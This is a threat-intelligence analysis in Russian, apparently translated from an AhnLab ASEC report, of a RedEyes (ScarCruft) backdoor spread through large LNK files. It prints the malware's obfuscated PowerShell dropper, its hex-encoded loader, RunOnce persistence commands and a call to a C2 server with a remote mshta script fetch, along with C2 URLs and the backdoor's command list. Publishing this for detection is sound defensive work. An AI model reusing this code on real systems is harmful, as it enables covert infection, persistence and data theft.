RedEyes (ScarCruft) Backdoor IOCs

Центр экстренного реагирования на чрезвычайные ситуации AhnLab Security (ASEC) подтвердил, что вредоносная программа, ранее распространявшаяся в формате CHM, теперь распространяется в формате LNK. Эта вредоносная программа выполняет дополнительные скрипты, расположенные по определенному URL, через процесс mshta. Затем он получает команды с сервера угрожающего агента для выполнения дополнительных вредоносных действий.

RedEyes (ScarCruft) Backdoor

Атакующий распространяет подтвержденный LNK-файл на обычном сайте, загружая его вместе с вредоносным ПО в сжатом файле.

Вредоносный LNK-файл был загружен под именем 'REPORT.ZIP'. Подобно вредоносному ПО, выявленному в статье, этот файл имеет LNK, содержащий обычные данные документа Excel и код вредоносного скрипта.

Поэтому при выполнении файла 'Status Survey Table.xlsx.lnk' в папке %Temp% с помощью команд PowerShell создается и исполняется обычный документ 'Status Survey Table.xlsx' и вредоносный скрипт 'PMmVvG56FLC9y.bat'.

/c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = '%temp%'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq 0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = '%temp%\Status Survey Table.xlsx';sc $tyxkEP ([byte[]]($C5ytw ^| select -Skip 62464)) -Encoding Byte; ^&amp; $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = '%temp%\PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj ^| select -Skip 74342)) -Encoding Byte;^&amp; %windir%\SysWOW64\cmd.exe /c $WH9lSPHOFI;

/c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = '%temp%'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq 0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = '%temp%\Status Survey Table.xlsx';sc $tyxkEP ([byte[]]($C5ytw ^| select -Skip 62464)) -Encoding Byte; ^& $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = '%temp%\PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj ^| select -Skip 74342)) -Encoding Byte;^& %windir%\SysWOW64\cmd.exe /c $WH9lSPHOFI;

'Status Survey Table.xlsx' выглядит как обычный документ Excel и выдает себя за корейскую государственную организацию следующим образом.

При выполнении параллельно созданного файла 'PMmVvG56FLC9y.bat' он копируется в папку '%appdata%\Microsoft\Protect\' как 'UserProfileSafeBackup.bat'. После этого он регистрируется в следующем реестре, чтобы обеспечить постоянное выполнение BAT-файла.

Путь к реестру: HKCU\ Software\Microsoft\Windows\CurrentVersion\RunOnce
Имя значения: BackupUserProfiles
Значение: C:\Windows\SysWOW64\cmd.exe /c %appdata%\Microsoft\Protect\UserProfileSafeBackup.bat

После регистрации в указанном реестре выполняется команда PowerShell в шестнадцатеричном формате внутри BAT-файла.

copy %~f0 "%appdata%\Microsoft\Protect\UserProfileSafeBackup.bat"
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v BackupUserProfiles /t REG_SZ /f /d "C:\Windows\SysWOW64\cmd.exe /c %appdata%\Microsoft\Protect\UserProfileSafeBackup.bat"
start /min C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command 
"$m6drsidu ="$jWHmcU="""53746172742D536C656570202D&lt;omitted&gt;""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};
Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";
Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));"

copy %~f0 "%appdata%\Microsoft\Protect\UserProfileSafeBackup.bat"

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v BackupUserProfiles /t REG_SZ /f /d "C:\Windows\SysWOW64\cmd.exe /c %appdata%\Microsoft\Protect\UserProfileSafeBackup.bat"

start /min C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command

"$m6drsidu ="$jWHmcU="""53746172742D536C656570202D<omitted>""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};

Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";

Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));"

При выполнении команды PowerShell происходит регистрация ключа Run, а также выполнение дополнительных скриптов, использующих mshta. Кроме того, регистрация в реестре может осуществляться по командам агента угроз. Ниже приведена часть команды PowerShell, представленная в шестнадцатеричном формате в коде BAT-файла.

Start-Sleep -Seconds 67;
$nvSklUbaQ = 1024 * 1024;
$yixgsFVy = $env:COMPUTERNAME + '-' + $env:USERNAME+'-SH';
$aWw = 'hxxp://75.119.136[.]207/config/bases/config.php' + '?U=' + $yixgsFVy;
$bLmoifqHwJxhE = $env:TEMP + '/KsK';
if (!(Test-Path $bLmoifqHwJxhE)) { New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce" -Name Olm -Value 'c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 311714 2.2.2.2 || mshta hxxp://bian0151.cafe24[.]com/admin/board/1.html' -PropertyType String -Force;}

Start-Sleep -Seconds 67;

$nvSklUbaQ = 1024 * 1024;

$yixgsFVy = $env:COMPUTERNAME + '-' + $env:USERNAME+'-SH';

$aWw = 'hxxp://75.119.136[.]207/config/bases/config.php' + '?U=' + $yixgsFVy;

$bLmoifqHwJxhE = $env:TEMP + '/KsK';

if (!(Test-Path $bLmoifqHwJxhE)) { New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce" -Name Olm -Value 'c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 311714 2.2.2.2 || mshta hxxp://bian0151.cafe24[.]com/admin/board/1.html' -PropertyType String -Force;}

Ниже приведены подтвержденные C2 и вредоносные URL:

hxxp://75.119.136[.]207/config/bases/config.php?U=[COMPUTERNAME]-[USERNAME]-SH // Получает команды от агента угрозы
hxxp://75.119.136.207/config/bases/config.php?R=[‘EOF’ encoded in base64] // Передача результатов выполнения команды
hxxp://bian0151.cafe24[.]com/admin/board/1.html // Загрузка дополнительных кодов сценариев

Дополнительные коды скриптов (hxxp://bian0151.cafe24.com/admin/board/1.html), выполняемые через mshta, содержат команду PowerShell, обфусцированную в Base64, как показано ниже.

Декодированная команда PowerShell получает и обрабатывает команды от угрожающего агента по адресу hxxp://75.119.136[.]207/config/bases/config.php?U=[COMPUTERNAME]-[USERNAME]-SH. На рисунке 6 показана часть декодированной команды PowerShell.

Ниже перечислены команды и функции, которые могут быть выполнены.

pcinfo	Сбор информации о ПК
drive	Сбор информации о дисках
clipboard	Сбор информации о содержимом буфера обмена
svc	Сбор служебной информации
process	Сбор информации о запущенных процессах
fileinfo	Собирает имена, размеры, даты последнего использования и полные пути для подфайлов в полученном пути
start	Выполнение полученной команды через cmd
plugin	Загрузка и выполнение дополнительных файлов через PowerShell
down	Загружает дополнительные файлы по полученному пути
up	Загружает файлы из полученного пути
regedit	Добавляет файлы в реестр
compress	Сжимает файлы

Есть подозрение, что злоумышленник постоянно модифицирует код скрипта, поскольку команды, приведенные в табл. 1, отличаются от ранее идентифицированных. Поэтому, помимо подтвержденных на данный момент функциональных возможностей, могут выполняться и другие вредоносные действия.

Помимо LNK-файла, сжатые файлы 'KB_20230531.rar', 'attachment.rar' и 'hanacard_20230610.rar', идентифицированные на рис. 1 вместе с 'REPORT.ZIP', также содержат ранее идентифицированный вредоносный CHM-файл. Подобно описанному ранее LNK-файлу, этот CHM-файл представляет собой вредоносное ПО, использующее mshta для выполнения дополнительных скриптов, расположенных по определенным URL-адресам.

В связи с массовым распространением в последнее время вредоносных программ, использующих CHM- и LNK-файлы, пользователям следует проявлять повышенную осторожность. В случае с вредоносными LNK-файлами было замечено, что размер значительного их числа превышает 10 МБ. Поэтому пользователям следует воздержаться от выполнения больших LNK-файлов из неизвестных источников.

RedEyes (ScarCruft) Backdoor IOCs

RedEyes (ScarCruft) Backdoor

Indicators of Compromise

URLs

MD5